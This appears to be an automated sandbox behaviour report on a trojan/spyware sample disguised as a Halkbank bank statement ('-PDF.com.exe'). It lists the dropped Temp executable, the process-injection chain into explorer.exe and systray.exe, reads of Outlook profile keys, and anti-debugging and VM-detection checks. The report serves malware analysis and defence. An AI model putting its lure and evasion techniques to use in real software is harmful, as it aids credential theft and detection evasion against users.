          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0041E5F3 NtCreateFile,3_2_0041E5F3
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0041E6A3 NtReadFile,3_2_0041E6A3
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0041E723 NtClose,3_2_0041E723
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0041E7D3 NtAllocateVirtualMemory,3_2_0041E7D3
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0041E5ED NtCreateFile,3_2_0041E5ED
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0041E69D NtReadFile,3_2_0041E69D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0041E7CD NtAllocateVirtualMemory,3_2_0041E7CD
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00AF98F0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00AF9860
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk,3_2_00AF9840
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk,3_2_00AF99A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00AF9910
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk,3_2_00AF9A20
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AF9A00
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk,3_2_00AF9A50
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF95D0 NtClose,LdrInitializeThunk,3_2_00AF95D0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk,3_2_00AF9540
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AF96E0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AF9660
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AF97A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,3_2_00AF9780
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk,3_2_00AF9FE0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,3_2_00AF9710
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF98A0 NtWriteVirtualMemory,3_2_00AF98A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9820 NtEnumerateKey,3_2_00AF9820
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AFB040 NtSuspendThread,3_2_00AFB040
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF99D0 NtCreateProcessEx,3_2_00AF99D0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9950 NtQueueApcThread,3_2_00AF9950
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9A80 NtOpenDirectoryObject,3_2_00AF9A80
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9A10 NtQuerySection,3_2_00AF9A10
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AFA3B0 NtGetContextThread,3_2_00AFA3B0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9B00 NtSetValueKey,3_2_00AF9B00
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF95F0 NtQueryInformationFile,3_2_00AF95F0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9520 NtWaitForSingleObject,3_2_00AF9520
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AFAD30 NtSetContextThread,3_2_00AFAD30
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9560 NtWriteFile,3_2_00AF9560
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF96D0 NtCreateKey,3_2_00AF96D0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9610 NtEnumerateValueKey,3_2_00AF9610
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9670 NtQueryInformationProcess,3_2_00AF9670
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9650 NtQueryValueKey,3_2_00AF9650
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9730 NtQueryVirtualMemory,3_2_00AF9730
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AFA710 NtOpenProcessToken,3_2_00AFA710
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9760 NtOpenProcess,3_2_00AF9760
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF9770 NtSetInformationFile,3_2_00AF9770
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AFA770 NtOpenThread,3_2_00AFA770
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeVirustotal: Detection: 40%
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeJump to behavior
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeProcess created: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.ojJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeProcess created: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exeJump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsw4A96.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/5@6/3
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCommand line argument: `\@1_2_00405BB0
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: jmaxbgpy.exe, 00000001.00000003.325098784.000000001A0F0000.00000004.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000001.00000003.317555624.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000003.325733706.0000000000760000.00000004.00000020.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000002.375074700.0000000000BAF000.00000040.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000003.328207996.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000005.00000002.576795958.000000000456F000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000005.00000002.576795958.0000000004450000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000005.00000003.376509769.00000000042BB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000005.00000003.374772234.000000000411C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jmaxbgpy.exe, jmaxbgpy.exe, 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000003.325733706.0000000000760000.00000004.00000020.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000002.375074700.0000000000BAF000.00000040.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000003.328207996.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000005.00000002.576795958.000000000456F000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000005.00000002.576795958.0000000004450000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000005.00000003.376509769.00000000042BB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000005.00000003.374772234.000000000411C000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeUnpacked PE file: 3.2.jmaxbgpy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_00403045 push ecx; ret 1_2_00403058
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00407033 push ds; retf 3_2_00407034
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0041B377 pushad ; iretd 3_2_0041B378
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0041B379 push eax; iretd 3_2_0041B37A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00403444 push ebp; ret 3_2_00403450
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_004055DA push ecx; ret 3_2_004055E1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_004105E3 push esi; iretd 3_2_004105ED
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00401DB0 push eax; ret 3_2_00401DB2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B0D0D1 push ecx; ret 3_2_00B0D0E4
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_00402826 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00402826
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeJump to dropped file
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\SysWOW64\systray.exe TID: 4556Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE6A60 rdtscp 3_2_00AE6A60
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 873Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeAPI coverage: 9.0 %
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_008A07DA GetSystemInfo,1_2_008A07DA
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000002.585680248.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000003.537019494.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.548400763.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000004.00000003.548400763.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.336808635.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.537918388.000000000F013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548049529.000000000F014000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.532899234.000000000F00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549035185.000000000F014000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533653741.000000000F00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.588601601.000000000F014000.00000004.00000001.00020000.00000000.sdmp, systray.exe, 00000005.00000002.578396952.0000000006FB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000003.548400763.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: systray.exe, 00000005.00000002.576305318.0000000000317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
          Source: explorer.exe, 00000004.00000002.585680248.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000003.536463876.000000000EFBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.532899234.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.588548315.000000000EFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.534851014.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_00401E36 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00401E36
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_00402826 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00402826
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_004085CE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_004085CE
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE6A60 rdtscp 3_2_00AE6A60
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_008A005F mov eax, dword ptr fs:[00000030h]1_2_008A005F
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_008A0109 mov eax, dword ptr fs:[00000030h]1_2_008A0109
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_008A013E mov eax, dword ptr fs:[00000030h]1_2_008A013E
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_008A017B mov eax, dword ptr fs:[00000030h]1_2_008A017B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF90AF mov eax, dword ptr fs:[00000030h]3_2_00AF90AF
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]3_2_00AEF0BF
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]3_2_00AEF0BF
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]3_2_00AEF0BF
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB9080 mov eax, dword ptr fs:[00000030h]3_2_00AB9080
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]3_2_00B33884
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]3_2_00B33884
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB58EC mov eax, dword ptr fs:[00000030h]3_2_00AB58EC
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]3_2_00AB40E1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]3_2_00AB40E1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]3_2_00AB40E1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]3_2_00B4B8D0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
